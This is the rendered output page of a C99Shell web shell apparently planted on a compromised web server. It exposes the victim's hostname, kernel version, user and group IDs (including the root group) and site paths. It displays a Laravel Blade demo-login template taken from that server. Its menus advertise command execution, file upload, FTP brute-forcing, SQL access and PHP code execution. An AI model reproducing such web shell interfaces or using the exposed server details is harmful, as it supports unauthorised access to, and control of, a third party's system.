!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/test.sms.picotech.app/public_html/resources/views/front/   drwxr-xr-x
Free 23.51 GB of 117.98 GB (19.92%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     login_demo.blade.php (1.68 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.frontLayout')

@section('title') {{get_settings('app_name')}} - Demo Login @endsection

@section('css')
    <style>
        .custom{
            padding-top: 50px;
        }
        .demo-remove{
            display: none;!important;
        }
    </style>

@endsection

@section('header')
    <div class="container">
        <div class="page-banner">
            <div class="custom">
                <h1 class="text-center" style="color: rgba(100, 95, 136, 0.75);">{{get_settings('app_name')}}</h1>
                <div class="divider mx-auto"></div>
            </div>
            <div class="row justify-content-center align-items-center h-75">

                <div class="col-lg-2">
                    <nav aria-label="Breadcrumb">
                        <ul class="breadcrumb justify-content-center py-0 bg-transparent">
                            <li class="breadcrumb-item"><a href="{{route('admin.login')}}" class="btn btn-outline-primary btn-sm pl-4 pr-4"><i class="fa fa-sign-in"></i></a></li>
                        </ul>
                    </nav>
                    <p class="text-center">Admin Login</p>
                </div>
                <div class="col-lg-2">
                    <nav aria-label="Breadcrumb">
                        <ul class="breadcrumb justify-content-center py-0 bg-transparent">
                            <li class="breadcrumb-item"><a href="{{route('login')}}" class="btn btn-outline-primary btn-sm pl-4 pr-4"><i class="fa fa-sign-in"></i></a></li>
                        </ul>
                    </nav>
                    <p class="text-center">Customer Login</p>
                </div>
            </div>
        </div>
    </div>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--